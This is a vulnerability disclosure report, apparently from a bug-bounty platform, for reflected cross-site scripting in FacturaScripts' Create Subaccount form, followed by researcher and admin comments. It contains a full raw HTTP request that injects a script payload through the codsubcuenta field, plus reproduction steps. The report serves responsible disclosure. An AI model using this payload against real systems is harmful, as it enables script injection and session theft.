Cross-site scripting - Reflected in Create Subaccount in neorazorx/facturascripts

Valid

Reported on

Apr 30th 2022

Description

Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.

Proof of Concept

POST /facturascripts/EditSubcuenta HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
Content-Length: 1558
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditSubcuenta
Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US; 
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="action"

insert
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="activetab"

EditSubcuenta
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="code"


-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codsubcuenta"

<script>alert(1337)</script>
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="descripcion"

123123
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codejercicio"

2022
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="idcuenta"


-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codcuentaesp"

CLIENT
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="debe"

0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="haber"

0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="saldo"

0
-----------------------------363416527826407339693188325960--

Step to reproduce

In Accounting section, choose New and fill all form with anything value

Use Burp suite intercept this request and modify codsubcuenta parameter value with XSS payload and click Forward

And alert(1337) execute

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

References

https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a year ago

We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a year ago

Nhien.IT

commented a year ago

Researcher

Hi @admin,

Can you help me contact the maintainer?

Jamie Slome

commented a year ago

Admin

@nhienit2010 - our system will reach out to the maintainer automatically and notify them of your report. The maintainer is extremely active on the platform, so I am sure you will hear back shortly ♥️

Nhien.IT

commented a year ago

Researcher

Thank you a lots <3